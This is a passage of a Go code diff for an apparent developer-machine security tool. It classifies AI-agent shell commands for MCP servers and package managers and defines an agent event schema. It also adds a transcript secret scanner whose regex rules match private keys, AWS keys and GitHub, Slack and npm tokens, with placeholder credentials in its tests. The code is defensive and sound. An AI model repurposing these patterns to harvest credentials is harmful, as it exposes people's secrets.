+func ClassifyShell(ctx context.Context, cmd string) (*event.MCPInfo, bool) { + if isCtxCanceled(ctx) { + return nil, true + } + lower := strings.ToLower(cmd) + switch { + case strings.Contains(lower, "@modelcontextprotocol/"): + info := &event.MCPInfo{ + Kind: "local", + ServerCommand: redactedSnippet(cmd), + } + if name := extractMCPServerName(lower); name != "" { + info.ServerName = name + } + return info, false + case strings.Contains(lower, "claude mcp"): + return &event.MCPInfo{ + Kind: "unknown", + ServerCommand: redactedSnippet(cmd), + }, false + case strings.Contains(lower, " mcp ") || strings.HasPrefix(lower, "mcp "): + return &event.MCPInfo{ + Kind: "unknown", + ServerCommand: redactedSnippet(cmd), + }, false + } + return nil, false +} + +func extractMCPServerName(cmd string) string { + const marker = "@modelcontextprotocol/" + _, rest, ok := strings.Cut(cmd, marker) + if !ok { + return "" + } + for i, r := range rest { + if r == ' ' || r == '\t' || r == '@' || r == ',' { + return rest[:i] + } + } + return rest +} + +func redactedSnippet(cmd string) string { + s := redact.String(cmd) + if len(s) > serverCommandCap { + return s[:serverCommandCap] + } + return s +} + +func isCtxCanceled(ctx context.Context) bool { + select { + case <-ctx.Done(): + return errors.Is(ctx.Err(), context.DeadlineExceeded) + default: + return false + } +} diff --git a/internal/aiagents/enrich/mcp/classify_test.go b/internal/aiagents/enrich/mcp/classify_test.go new file mode 100644 index 0000000..28e7807 --- /dev/null +++ b/internal/aiagents/enrich/mcp/classify_test.go @@ -0,0 +1,65 @@ +package mcp + +import ( + "context" + "strings" + "testing" +) + +func TestClassifyShellMCPPackageIsLocal(t *testing.T) { + info, _ := ClassifyShell(context.Background(), "npx -y @modelcontextprotocol/server-filesystem /tmp") + if info == nil { + t.Fatalf("expected detection") + } + if info.ServerName != "server-filesystem" { + t.Errorf("server: %q", info.ServerName) + } + if info.Kind != "local" 
{ + t.Errorf("kind: %q", info.Kind) + } + if info.ServerCommand == "" { + t.Errorf("expected redacted server_command snippet") + } +} + +func TestClassifyShellNonMCP(t *testing.T) { + info, _ := ClassifyShell(context.Background(), "npm install lodash") + if info != nil { + t.Fatalf("expected nil, got %+v", info) + } +} + +// `claude mcp list` must be classified by the Claude-specific rule, not +// the generic ` mcp ` rule that would otherwise win on substring order. +// Both currently produce the same shape, but the ordering preserves +// future room to differentiate. +func TestClassifyShellClaudeMCPDetected(t *testing.T) { + info, _ := ClassifyShell(context.Background(), "claude mcp list") + if info == nil { + t.Fatalf("expected detection") + } + if info.Kind != "unknown" { + t.Errorf("kind: %q", info.Kind) + } +} + +// Bare `mcp ...` falls through to the generic rule but stays detected. +func TestClassifyShellGenericMCPDetected(t *testing.T) { + info, _ := ClassifyShell(context.Background(), "mcp foo") + if info == nil { + t.Fatalf("expected detection") + } +} + +// ServerCommand must be redacted before storage so a token in a +// pre-command env assignment never lands on disk. +func TestClassifyShellRedactsServerCommand(t *testing.T) { + cmd := "GITHUB_TOKEN=ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa npx -y @modelcontextprotocol/server-github" + info, _ := ClassifyShell(context.Background(), cmd) + if info == nil { + t.Fatalf("expected detection") + } + if strings.Contains(info.ServerCommand, "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") { + t.Errorf("server_command not redacted: %q", info.ServerCommand) + } +} diff --git a/internal/aiagents/enrich/npm/detect.go b/internal/aiagents/enrich/npm/detect.go new file mode 100644 index 0000000..f8be654 --- /dev/null +++ b/internal/aiagents/enrich/npm/detect.go @@ -0,0 +1,126 @@ +// Package npm classifies and enriches npm-ecosystem package manager activity +// observed in shell commands. 
Detection is pure; enrichment may shell out to +// npm/pnpm/yarn/bun under a caller-provided context. +package npm + +import ( + "strings" + + "github.com/google/shlex" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" +) + +// Manager identifies a supported package manager. +type Manager string + +const ( + NPM Manager = "npm" + NPX Manager = "npx" + PNPM Manager = "pnpm" + Yarn Manager = "yarn" + Bun Manager = "bun" +) + +// Detection summarizes which manager and command kind were detected. +type Detection struct { + Manager Manager + CommandKind string // install | uninstall | exec | publish | other + Args []string +} + +// Detect parses cmd and returns the package-manager classification, or nil. +func Detect(cmd string) *Detection { + tokens, err := shlex.Split(cmd) + if err != nil || len(tokens) == 0 { + // Fall back to whitespace split; shlex fails on unbalanced quotes. + tokens = strings.Fields(cmd) + if len(tokens) == 0 { + return nil + } + } + for len(tokens) > 0 && (strings.Contains(tokens[0], "=") || tokens[0] == "env") { + tokens = tokens[1:] + } + if len(tokens) == 0 { + return nil + } + bin := tokens[0] + if idx := strings.LastIndexByte(bin, '/'); idx >= 0 { + bin = bin[idx+1:] + } + mgr, ok := managerFromBinary(bin) + if !ok { + return nil + } + args := tokens[1:] + return &Detection{ + Manager: mgr, + CommandKind: classifyKind(mgr, args), + Args: args, + } +} + +func managerFromBinary(bin string) (Manager, bool) { + switch bin { + case "npm": + return NPM, true + case "npx": + return NPX, true + case "pnpm", "pnpx": + return PNPM, true + case "yarn": + return Yarn, true + case "bun", "bunx": + return Bun, true + } + return "", false +} + +func classifyKind(mgr Manager, args []string) string { + var sub string + for _, a := range args { + if strings.HasPrefix(a, "-") { + continue + } + sub = strings.ToLower(a) + break + } + if sub == "" { + switch mgr { + case PNPM, Yarn, Bun: + return "install" + } + return "other" + } + switch 
sub { + case "i", "install", "ci", "add": + return "install" + case "uninstall", "remove", "rm", "un": + return "uninstall" + case "exec", "run", "x", "dlx": + return "exec" + case "publish": + return "publish" + case "audit": + return "audit" + } + if mgr == NPX || mgr == Bun { + return "exec" + } + return "other" +} + +func confidence(m Manager) string { + switch m { + case NPM, NPX: + return "high" + case PNPM, Yarn: + return "medium" + case Bun: + return "low" + } + return "low" +} + +// EnrichResult is a thin alias used by the hook runtime. +type EnrichResult = event.PackageManagerInfo diff --git a/internal/aiagents/enrich/npm/detect_test.go b/internal/aiagents/enrich/npm/detect_test.go new file mode 100644 index 0000000..c90ff79 --- /dev/null +++ b/internal/aiagents/enrich/npm/detect_test.go @@ -0,0 +1,58 @@ +package npm + +import "testing" + +func TestDetect(t *testing.T) { + cases := []struct { + cmd string + want Manager + kind string + }{ + {"npm install lodash", NPM, "install"}, + {"npm i", NPM, "install"}, + {"npm uninstall lodash", NPM, "uninstall"}, + {"npm publish", NPM, "publish"}, + {"npm audit", NPM, "audit"}, + {"npx -y create-vite my-app", NPX, "exec"}, + {"pnpm add react", PNPM, "install"}, + {"pnpm remove react", PNPM, "uninstall"}, + {"pnpm", PNPM, "install"}, + {"yarn add lodash", Yarn, "install"}, + {"yarn", Yarn, "install"}, + {"bun add zod", Bun, "install"}, + {"bunx prisma generate", Bun, "exec"}, + {"/usr/local/bin/npm install", NPM, "install"}, + {"FOO=bar npm install lodash", NPM, "install"}, + } + for _, tc := range cases { + t.Run(tc.cmd, func(t *testing.T) { + d := Detect(tc.cmd) + if d == nil { + t.Fatalf("expected detection for %q", tc.cmd) + } + if d.Manager != tc.want { + t.Fatalf("manager: got %s want %s", d.Manager, tc.want) + } + if d.CommandKind != tc.kind { + t.Fatalf("kind: got %s want %s", d.CommandKind, tc.kind) + } + }) + } +} + +func TestDetectIgnoresUnrelatedCommands(t *testing.T) { + for _, cmd := range 
[]string{"git push", "cargo build", "ls", "echo hi", ""} { + if d := Detect(cmd); d != nil { + t.Errorf("expected nil for %q, got %+v", cmd, d) + } + } +} + +func TestConfidenceLabels(t *testing.T) { + if got := confidence(NPM); got != "high" { + t.Errorf("npm confidence: %s", got) + } + if got := confidence(Bun); got != "low" { + t.Errorf("bun confidence: %s", got) + } +} diff --git a/internal/aiagents/enrich/npm/enrich.go b/internal/aiagents/enrich/npm/enrich.go new file mode 100644 index 0000000..cbdf7ba --- /dev/null +++ b/internal/aiagents/enrich/npm/enrich.go @@ -0,0 +1,96 @@ +package npm + +import ( + "context" + "errors" + "os" + "path/filepath" + "strings" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" +) + +// Enrich runs detection plus light enrichment for the supplied shell command. +// It returns nil when no package manager is detected. The second return reports +// whether the underlying context was cancelled by its deadline. 
+func Enrich(ctx context.Context, cmd, cwd string) (*event.PackageManagerInfo, bool) { + det := Detect(cmd) + if det == nil { + return nil, false + } + + info := &event.PackageManagerInfo{ + Detected: true, + Name: string(det.Manager), + CommandKind: det.CommandKind, + Confidence: confidence(det.Manager), + } + + if reg, source, ok := Resolve(ctx, string(det.Manager), cwd); ok { + info.Registry = reg + info.Evidence = append(info.Evidence, string(source)) + if source == SourceNPM { + info.ConfigSources = npmConfigSources(ctx, cwd) + } + } + addLockfileEvidence(info, det.Manager, cwd) + + if isCtxCanceled(ctx) { + return info, true + } + return info, false +} + +func addLockfileEvidence(info *event.PackageManagerInfo, m Manager, cwd string) { + if cwd == "" { + return + } + pairs := []struct { + mgr Manager + file string + }{ + {NPM, "package-lock.json"}, + {PNPM, "pnpm-lock.yaml"}, + {Yarn, "yarn.lock"}, + {Bun, "bun.lockb"}, + {Bun, "bun.lock"}, + } + for _, p := range pairs { + if p.mgr != m { + continue + } + if _, err := os.Stat(filepath.Join(cwd, p.file)); err == nil { + info.Evidence = append(info.Evidence, p.file) + } + } +} + +func npmConfigSources(ctx context.Context, cwd string) []string { + out, err := runFunc(ctx, cwd, "npm", "config", "ls", "-l") + if err != nil || out == "" { + return nil + } + var sources []string + for _, line := range strings.Split(out, "\n") { + line = strings.TrimSpace(line) + if !strings.HasPrefix(line, "; ") || !strings.Contains(line, "config from ") { + continue + } + idx := strings.Index(line, "config from ") + path := strings.Trim(line[idx+len("config from "):], `"' `) + if path != "" { + sources = append(sources, redact.String(path)) + } + } + return sources +} + +func isCtxCanceled(ctx context.Context) bool { + select { + case <-ctx.Done(): + return errors.Is(ctx.Err(), context.DeadlineExceeded) + default: + return false + } +} diff --git a/internal/aiagents/enrich/npm/enrich_test.go 
b/internal/aiagents/enrich/npm/enrich_test.go new file mode 100644 index 0000000..625189c --- /dev/null +++ b/internal/aiagents/enrich/npm/enrich_test.go @@ -0,0 +1,38 @@ +package npm + +import ( + "context" + "strings" + "testing" +) + +func TestEnrichCapturesNPMRegistryAndConfigSources(t *testing.T) { + if !canLookPath("npm") { + t.Skip("npm not on PATH") + } + stubRun(t, func(_ context.Context, _, _ string, args ...string) (string, error) { + joined := strings.Join(args, " ") + switch joined { + case "config get registry": + return "https://registry.npmjs.org/\n", nil + case "config ls -l": + return "; project config from /tmp/project/.npmrc\n", nil + } + return "", nil + }) + + info, timedOut := Enrich(context.Background(), "npm install lodash", "") + + if timedOut { + t.Fatal("unexpected timeout") + } + if info == nil { + t.Fatal("expected package manager info") + } + if info.Registry != "https://registry.npmjs.org/" { + t.Errorf("registry: %q", info.Registry) + } + if len(info.ConfigSources) != 1 || info.ConfigSources[0] != "/tmp/project/.npmrc" { + t.Errorf("config sources: %v", info.ConfigSources) + } +} diff --git a/internal/aiagents/enrich/npm/registry.go b/internal/aiagents/enrich/npm/registry.go new file mode 100644 index 0000000..7c3b8b8 --- /dev/null +++ b/internal/aiagents/enrich/npm/registry.go @@ -0,0 +1,115 @@ +package npm + +import ( + "context" + "errors" + "os" + "os/exec" + "path/filepath" + "strings" +) + +// Source identifies which command produced the resolution. Empty when +// resolution failed. +type Source string + +const ( + SourceNPM Source = "npm config get registry" + SourcePNPM Source = "pnpm config get registry" + SourceYarnV2 Source = "yarn config get npmRegistryServer" + SourceYarnV1 Source = "yarn config get registry" + SourceBun Source = "bun pm config get registry" +) + +var runFunc = execRun + +func execRun(ctx context.Context, cwd, bin string, args ...string) (string, error) { + cmd := exec.CommandContext(ctx, bin, args...) 
+ if cwd != "" { + cmd.Dir = cwd + } + cmd.Env = []string{ + "PATH=" + os.Getenv("PATH"), + "HOME=" + os.Getenv("HOME"), + } + out, err := cmd.Output() + if err != nil { + if errors.Is(ctx.Err(), context.DeadlineExceeded) || errors.Is(ctx.Err(), context.Canceled) { + return "", ctx.Err() + } + return "", err + } + return string(out), nil +} + +// Resolve returns the effective registry URL for pm rooted at cwd. ok=false on +// failure; callers should treat that as data unavailable, not as a verdict. +func Resolve(ctx context.Context, pm, cwd string) (registry string, source Source, ok bool) { + switch pm { + case "npm", "npx": + return resolveSimple(ctx, cwd, "npm", []string{"config", "get", "registry"}, SourceNPM) + case "pnpm", "pnpx": + return resolveSimple(ctx, cwd, "pnpm", []string{"config", "get", "registry"}, SourcePNPM) + case "yarn": + return resolveYarn(ctx, cwd) + case "bun", "bunx": + return resolveSimple(ctx, cwd, "bun", []string{"pm", "config", "get", "registry"}, SourceBun) + } + return "", "", false +} + +func resolveSimple(ctx context.Context, cwd, bin string, args []string, src Source) (string, Source, bool) { + if _, err := exec.LookPath(bin); err != nil { + return "", "", false + } + out, err := runFunc(ctx, cwd, bin, args...) 
+ if err != nil { + return "", "", false + } + v := strings.TrimSpace(out) + if v == "" || v == "undefined" { + return "", "", false + } + return v, src, true +} + +func resolveYarn(ctx context.Context, cwd string) (string, Source, bool) { + if _, err := exec.LookPath("yarn"); err != nil { + return "", "", false + } + if isYarnBerry(cwd) { + out, err := runFunc(ctx, cwd, "yarn", "config", "get", "npmRegistryServer") + if err == nil { + if v := strings.TrimSpace(out); v != "" && v != "undefined" { + return v, SourceYarnV2, true + } + } + return "", "", false + } + out, err := runFunc(ctx, cwd, "yarn", "config", "get", "registry") + if err != nil { + return "", "", false + } + v := strings.TrimSpace(out) + if v == "" || v == "undefined" { + return "", "", false + } + return v, SourceYarnV1, true +} + +func isYarnBerry(cwd string) bool { + if cwd == "" { + return false + } + dir := cwd + for { + if _, err := os.Stat(filepath.Join(dir, ".yarnrc.yml")); err == nil { + return true + } + parent := filepath.Dir(dir) + if parent == dir { + return false + } + dir = parent + } +} diff --git a/internal/aiagents/enrich/npm/registry_test.go b/internal/aiagents/enrich/npm/registry_test.go new file mode 100644 index 0000000..32ec696 --- /dev/null +++ b/internal/aiagents/enrich/npm/registry_test.go @@ -0,0 +1,87 @@ +package npm + +import ( + "context" + "errors" + "os" + "os/exec" + "path/filepath" + "testing" +) + +func stubRun(t *testing.T, fn func(ctx context.Context, cwd, bin string, args ...string) (string, error)) { + t.Helper() + orig := runFunc + runFunc = fn + t.Cleanup(func() { runFunc = orig }) +} + +func TestResolveUnknownManagerReturnsNotOK(t *testing.T) { + _, _, ok := Resolve(context.Background(), "cargo", "") + if ok { + t.Errorf("expected ok=false for unknown pm") + } +} + +func TestResolveNPMTrimsWhitespace(t *testing.T) { + stubRun(t, func(_ context.Context, _, _ string, _ ...string) (string, error) { + return "https://registry.npmjs.org/\n", nil + }) + if 
!canLookPath("npm") { + t.Skip("npm not on PATH; LookPath gate would block stub") + } + got, src, ok := Resolve(context.Background(), "npm", "") + if !ok { + t.Fatal("expected ok") + } + if got != "https://registry.npmjs.org/" { + t.Errorf("registry: %q", got) + } + if src != SourceNPM { + t.Errorf("source: %s", src) + } +} + +func TestResolveYarnDetectsBerry(t *testing.T) { + dir := t.TempDir() + if err := os.WriteFile(filepath.Join(dir, ".yarnrc.yml"), []byte(""), 0o600); err != nil { + t.Fatal(err) + } + if !isYarnBerry(dir) { + t.Errorf("expected Berry detection in %s", dir) + } + if isYarnBerry(t.TempDir()) { + t.Errorf("expected non-Berry in empty dir") + } +} + +func TestResolveTreatsUndefinedAsMissing(t *testing.T) { + if !canLookPath("npm") { + t.Skip("npm not on PATH") + } + stubRun(t, func(_ context.Context, _, _ string, _ ...string) (string, error) { + return "undefined\n", nil + }) + _, _, ok := Resolve(context.Background(), "npm", "") + if ok { + t.Errorf("expected ok=false on 'undefined'") + } +} + +func TestResolvePropagatesRunError(t *testing.T) { + if !canLookPath("npm") { + t.Skip("npm not on PATH") + } + stubRun(t, func(_ context.Context, _, _ string, _ ...string) (string, error) { + return "", errors.New("boom") + }) + _, _, ok := Resolve(context.Background(), "npm", "") + if ok { + t.Errorf("expected ok=false on run error") + } +} + +func canLookPath(bin string) bool { + _, err := exec.LookPath(bin) + return err == nil +} diff --git a/internal/aiagents/enrich/secrets/rules.go b/internal/aiagents/enrich/secrets/rules.go new file mode 100644 index 0000000..7129bf8 --- /dev/null +++ b/internal/aiagents/enrich/secrets/rules.go @@ -0,0 +1,83 @@ +// Package secrets implements a self-contained transcript secret scanner. +// It is intentionally small: detection runs in-process with no external +// scanner binary. +package secrets + +import ( + "crypto/sha256" + "encoding/hex" + "regexp" + "strings" +) + +// rule is one detection rule. 
Group selects which submatch to fingerprint; +// 0 means the entire match. +type rule struct { + ID string + RE *regexp.Regexp + Group int + Confidence string +} + +var rules = []rule{ + { + ID: "private_key_block", + RE: regexp.MustCompile(`(?s)-----BEGIN[ A-Z]*PRIVATE KEY-----.*?-----END[ A-Z]*PRIVATE KEY-----`), + Confidence: "high", + }, + { + ID: "aws_access_key_id", + RE: regexp.MustCompile(`\b(?:AKIA|ASIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ABIA|ACCA)[0-9A-Z]{16}\b`), + Confidence: "high", + }, + { + ID: "aws_secret_access_key", + RE: regexp.MustCompile(`(?i)aws_secret_access_key\s*[:=]\s*"?([A-Za-z0-9/+=]{30,})`), + Group: 1, + Confidence: "medium", + }, + { + ID: "github_token", + RE: regexp.MustCompile(`\bgh[pousr]_[A-Za-z0-9]{16,}\b`), + Confidence: "high", + }, + { + ID: "slack_token", + RE: regexp.MustCompile(`\bxox[abprs]-[A-Za-z0-9-]{10,}\b`), + Confidence: "high", + }, + { + ID: "bearer_token", + RE: regexp.MustCompile(`(?i)authorization\s*[:=]\s*"?\s*bearer\s+([A-Za-z0-9._\-+/=]{16,})`), + Group: 1, + Confidence: "medium", + }, + { + ID: "npm_auth_token", + RE: regexp.MustCompile(`(?i)_authToken\s*=\s*([^\s"]+)`), + Group: 1, + Confidence: "high", + }, + { + ID: "generic_api_key", + RE: regexp.MustCompile(`(?i)\b(?:api[_-]?key|apikey)\s*[:=]\s*["']?([A-Za-z0-9_\-]{20,})`), + Group: 1, + Confidence: "low", + }, +} + +// fingerprint returns a stable hash for a secret value, suitable for +// dedup/correlation without storing the value itself. +func fingerprint(secret string) string { + h := sha256.Sum256([]byte(secret)) + // 12 bytes / 24 hex chars is plenty for de-duplication. + return hex.EncodeToString(h[:12]) +} + +// mask collapses the middle of a secret so previews carry no usable bytes. 
+func mask(secret string) string { + if len(secret) <= 8 { + return strings.Repeat("*", len(secret)) + } + return secret[:2] + strings.Repeat("*", len(secret)-4) + secret[len(secret)-2:] +} diff --git a/internal/aiagents/enrich/secrets/scanner.go b/internal/aiagents/enrich/secrets/scanner.go new file mode 100644 index 0000000..058caf6 --- /dev/null +++ b/internal/aiagents/enrich/secrets/scanner.go @@ -0,0 +1,120 @@ +package secrets + +import ( + "context" + "errors" + "io" + "os" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" +) + +// MaxFileBytes caps how much of any single file we load. Transcripts can +// grow large; we cap at 16 MiB per file to keep scanning bounded. +const MaxFileBytes int64 = 16 * 1024 * 1024 + +// ScanTranscript scans path for likely secrets and returns redacted +// findings. The returned bool reports whether ctx was cancelled (timeout). +// +// We read the whole bounded buffer once so multi-line patterns (PEM blocks) +// match correctly. Line numbers are recovered by counting newlines up to +// each match offset. 
+func ScanTranscript(ctx context.Context, path string) (*event.SecretsScanInfo, bool) { + if path == "" { + return nil, false + } + f, err := os.Open(path) + if err != nil { + return nil, false + } + defer f.Close() + + st, err := f.Stat() + if err != nil { + return nil, false + } + + limit := st.Size() + if limit > MaxFileBytes { + limit = MaxFileBytes + } + buf, err := io.ReadAll(io.LimitReader(f, limit)) + if err != nil && !errors.Is(err, io.EOF) { + return nil, false + } + + info := &event.SecretsScanInfo{Scanned: true, FilesSeen: 1, BytesSeen: int64(len(buf))} + if ctx.Err() != nil { + info.TimedOut = errors.Is(ctx.Err(), context.DeadlineExceeded) + return info, info.TimedOut + } + + text := string(buf) + seenFP := map[string]struct{}{} + + for _, r := range rules { + if ctx.Err() != nil { + info.TimedOut = errors.Is(ctx.Err(), context.DeadlineExceeded) + return info, info.TimedOut + } + matches := r.RE.FindAllStringSubmatchIndex(text, -1) + for _, m := range matches { + value := extract(text, m, r.Group) + if value == "" { + continue + } + fp := fingerprint(value) + if _, dup := seenFP[fp]; dup { + continue + } + seenFP[fp] = struct{}{} + startLine, endLine := lineRange(text, m[0], m[1]) + info.Findings = append(info.Findings, event.SecretFinding{ + RuleID: r.ID, + FilePath: path, + LineStart: startLine, + LineEnd: endLine, + Fingerprint: fp, + MaskedPreview: mask(value), + Confidence: r.Confidence, + }) + } + } + return info, info.TimedOut +} + +func extract(s string, indices []int, group int) string { + if group == 0 { + if len(indices) < 2 { + return "" + } + return s[indices[0]:indices[1]] + } + if len(indices) < 2*(group+1) { + return "" + } + start := indices[2*group] + end := indices[2*group+1] + if start < 0 || end < 0 || start >= end || end > len(s) { + return "" + } + return s[start:end] +} + +// lineRange returns the 1-indexed line numbers for byte offsets [start, end) +// in s. Both are inclusive in the returned [startLine, endLine] range. 
+func lineRange(s string, start, end int) (int, int) { + startLine := 1 + for i := 0; i < start && i < len(s); i++ { + if s[i] == '\n' { + startLine++ + } + } + endLine := startLine + for i := start; i < end && i < len(s); i++ { + if s[i] == '\n' { + endLine++ + } + } + return startLine, endLine +} diff --git a/internal/aiagents/enrich/secrets/scanner_test.go b/internal/aiagents/enrich/secrets/scanner_test.go new file mode 100644 index 0000000..8430c09 --- /dev/null +++ b/internal/aiagents/enrich/secrets/scanner_test.go @@ -0,0 +1,74 @@ +package secrets + +import ( + "context" + "os" + "path/filepath" + "strings" + "testing" +) + +func TestScanTranscriptFindsKnownSecrets(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "transcript.txt") + body := strings.Join([]string{ + "hello world", + "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY", + "AKIAIOSFODNN7EXAMPLE", + "ghp_abcdefghijklmnopqrstuvwxyz0123456789", + "_authToken=npm_xyz1234567890", + "-----BEGIN RSA PRIVATE KEY-----", + "MIIBOgIBAAJBAKj", + "-----END RSA PRIVATE KEY-----", + }, "\n") + if err := os.WriteFile(path, []byte(body), 0o600); err != nil { + t.Fatal(err) + } + info, _ := ScanTranscript(context.Background(), path) + if info == nil || !info.Scanned { + t.Fatal("expected scan result") + } + rules := map[string]bool{} + for _, f := range info.Findings { + rules[f.RuleID] = true + // Findings must never carry the raw value. 
+ if strings.Contains(f.MaskedPreview, "wJalrXUtnFEMI/K7MDENG") { + t.Errorf("masked preview leaks secret: %q", f.MaskedPreview) + } + if f.Fingerprint == "" { + t.Errorf("missing fingerprint for %s", f.RuleID) + } + } + for _, want := range []string{"aws_access_key_id", "aws_secret_access_key", "github_token", "npm_auth_token", "private_key_block"} { + if !rules[want] { + t.Errorf("expected rule %q to fire; got %v", want, rules) + } + } +} + +func TestScanTranscriptDeduplicatesByFingerprint(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "transcript.txt") + line := "ghp_abcdefghijklmnopqrstuvwxyz0123456789\n" + body := strings.Repeat(line, 10) + if err := os.WriteFile(path, []byte(body), 0o600); err != nil { + t.Fatal(err) + } + info, _ := ScanTranscript(context.Background(), path) + hits := 0 + for _, f := range info.Findings { + if f.RuleID == "github_token" { + hits++ + } + } + if hits != 1 { + t.Fatalf("expected dedup to leave 1 github_token finding, got %d", hits) + } +} + +func TestScanTranscriptMissingFileNoError(t *testing.T) { + info, timedOut := ScanTranscript(context.Background(), "/nonexistent/transcript.txt") + if info != nil || timedOut { + t.Fatalf("expected nil result for missing file, got %+v timedOut=%v", info, timedOut) + } +} diff --git a/internal/aiagents/event/event.go b/internal/aiagents/event/event.go new file mode 100644 index 0000000..930b687 --- /dev/null +++ b/internal/aiagents/event/event.go @@ -0,0 +1,274 @@ +// Package event defines the canonical AI-agent event schema. Adapters +// produce *Event from agent-piped stdin payloads; the hook runtime +// enriches and emits to telemetry. Every record carries an explicit +// schema_version so downstream consumers can detect format drift. +// +// SchemaVersion is "dmg.hook.event/v1". The constant lives here rather +// than in a separate version package because it is the schema's own +// identity, not a build-info concern. 
+package event + +import ( + "crypto/rand" + "encoding/hex" + "time" +) + +// SchemaVersion identifies this event schema on the wire and in +// telemetry. Every Event written or uploaded carries this value in its +// SchemaVersion field. Bumping requires a coordinated backend change. +const SchemaVersion = "dmg.hook.event/v1" + +// ActionType enumerates the kinds of activity the runtime can observe. +// It applies only to tool-bearing hook events (PreToolUse, PostToolUse, +// PostToolUseFailure). Lifecycle hooks (SessionStart, SessionEnd, +// Notification, Stop, SubagentStop, UserPromptSubmit, Elicitation, +// ElicitationResult, PermissionRequest, PermissionDenied) leave +// action_type unset — the hook_event field already names the +// lifecycle phase, and permission events describe a decision around a +// tool call rather than a tool call itself. +type ActionType string + +const ( + ActionFileRead ActionType = "file_read" + ActionFileWrite ActionType = "file_write" + ActionFileDelete ActionType = "file_delete" + ActionCommandExec ActionType = "command_exec" + ActionNetworkRequest ActionType = "network_request" + ActionToolUse ActionType = "tool_use" + ActionMCPInvocation ActionType = "mcp_invocation" +) + +// ResultStatus describes the recorded outcome. +type ResultStatus string + +const ( + ResultObserved ResultStatus = "observed" + ResultSuccess ResultStatus = "success" + ResultError ResultStatus = "error" + ResultTimeout ResultStatus = "timeout" + ResultPartial ResultStatus = "partial" +) + +// HookEvent is the native, agent-owned label for a hook lifecycle event. +// The string value is whatever the originating agent wrote on the wire — +// PreToolUse for Claude Code today, but tool.execute.before or +// pre_run_command for future adapters. It is NOT a global enum of every +// hook the runtime supports; the supported set lives behind each +// adapter's SupportedHooks() method. 
+// +// Constants below are convenience values for Claude Code, kept here so +// adapter and runtime code can refer to them by name without a separate +// adapter import. New adapters should define their own native constants +// in their own packages rather than adding to this list. +type HookEvent string + +const ( + HookPreToolUse HookEvent = "PreToolUse" + HookPostToolUse HookEvent = "PostToolUse" + HookPostToolUseFailure HookEvent = "PostToolUseFailure" + HookSessionStart HookEvent = "SessionStart" + HookSessionEnd HookEvent = "SessionEnd" + HookNotification HookEvent = "Notification" + HookStop HookEvent = "Stop" + HookSubagentStop HookEvent = "SubagentStop" + HookUserPrompt HookEvent = "UserPromptSubmit" + HookElicitation HookEvent = "Elicitation" + HookElicitationResult HookEvent = "ElicitationResult" + HookPermissionRequest HookEvent = "PermissionRequest" + HookPermissionDenied HookEvent = "PermissionDenied" +) + +// HookPhase is the normalized lifecycle classification of a hook event, +// independent of the originating agent. Adapters populate this alongside +// the native HookEvent. Policy and other cross-agent consumers should +// branch on HookPhase, never on a native HookEvent value. 
// HookPhase is the agent-neutral lifecycle phase of a hook event. Wire
// values are snake_case strings carried in hook_phase.
// NOTE(review): phases look like the normalized counterpart of the
// agent-specific HookEvent names (see shouldEvaluatePolicy, which
// branches on phase rather than hook name) — confirm against the
// adapter mapping.
type HookPhase string

const (
	HookPhaseUnknown           HookPhase = "unknown"
	HookPhasePreTool           HookPhase = "pre_tool"
	HookPhasePostTool          HookPhase = "post_tool"
	HookPhasePostToolFailure   HookPhase = "post_tool_failure"
	HookPhasePermissionRequest HookPhase = "permission_request"
	HookPhasePermissionDenied  HookPhase = "permission_denied"
	HookPhaseElicitation       HookPhase = "elicitation"
	HookPhaseElicitationResult HookPhase = "elicitation_result"
	HookPhaseUserPrompt        HookPhase = "user_prompt"
	HookPhaseSessionStart      HookPhase = "session_start"
	HookPhaseSessionEnd        HookPhase = "session_end"
	HookPhaseNotification      HookPhase = "notification"
	HookPhaseStop              HookPhase = "stop"
	HookPhaseSubagentStop      HookPhase = "subagent_stop"
)

// Event is the canonical AI-agent event record. JSON keys match the
// upload wire format. Optional fields use omitempty so absent data stays
// out of records.
type Event struct {
	SchemaVersion    string    `json:"schema_version"`
	EventID          string    `json:"event_id"`
	Timestamp        time.Time `json:"timestamp"`
	AgentName        string    `json:"agent_name"`
	AgentVersion     string    `json:"agent_version,omitempty"`
	HookEvent        HookEvent `json:"hook_event"`
	HookPhase        HookPhase `json:"hook_phase,omitempty"`
	SessionID        string    `json:"session_id,omitempty"`
	WorkingDirectory string    `json:"working_directory,omitempty"`
	PermissionMode   string    `json:"permission_mode,omitempty"`
	CustomerID       string    `json:"customer_id,omitempty"`
	UserIdentity     string    `json:"user_identity,omitempty"`
	DeviceID         string    `json:"device_id,omitempty"`
	ActionType       ActionType `json:"action_type,omitempty"`
	ToolName         string     `json:"tool_name,omitempty"`
	ToolUseID        string     `json:"tool_use_id,omitempty"`
	// No omitempty: result_status is always emitted, even as the zero
	// value (pinned by TestEventJSONOmitsEmptyFields).
	ResultStatus    ResultStatus     `json:"result_status"`
	IsSensitive     bool             `json:"is_sensitive,omitempty"`
	Payload         map[string]any   `json:"payload,omitempty"`
	Classifications *Classifications `json:"classifications,omitempty"`
	Enrichments     *Enrichments     `json:"enrichments,omitempty"`
	Timeouts        []TimeoutInfo    `json:"timeouts,omitempty"`
	Errors          []ErrorInfo      `json:"errors,omitempty"`
	PolicyDecision  *PolicyDecisionInfo `json:"policy_decision,omitempty"`
}

// PolicyDecisionInfo carries the full audit-side detail of a policy
// evaluation. The agent only sees a generic block message; this struct
// is the complete answer to "what did the runtime decide and why" in
// telemetry.
//
// Allowed records what the endpoint actually returned to the agent — it
// is the effective decision, not the policy verdict. WouldBlock captures
// the policy verdict; Enforced records whether the endpoint acted on it.
//
// Truth table:
//
//	mode=audit, no violation → Allowed=true,  WouldBlock=false, Enforced=false
//	mode=audit, violation    → Allowed=true,  WouldBlock=true,  Enforced=false
//	mode=block, no violation → Allowed=true,  WouldBlock=false, Enforced=false
//	mode=block, violation    → Allowed=false, WouldBlock=true,  Enforced=true
//
// dev-machine-guard currently runs audit-only, so Enforced is always
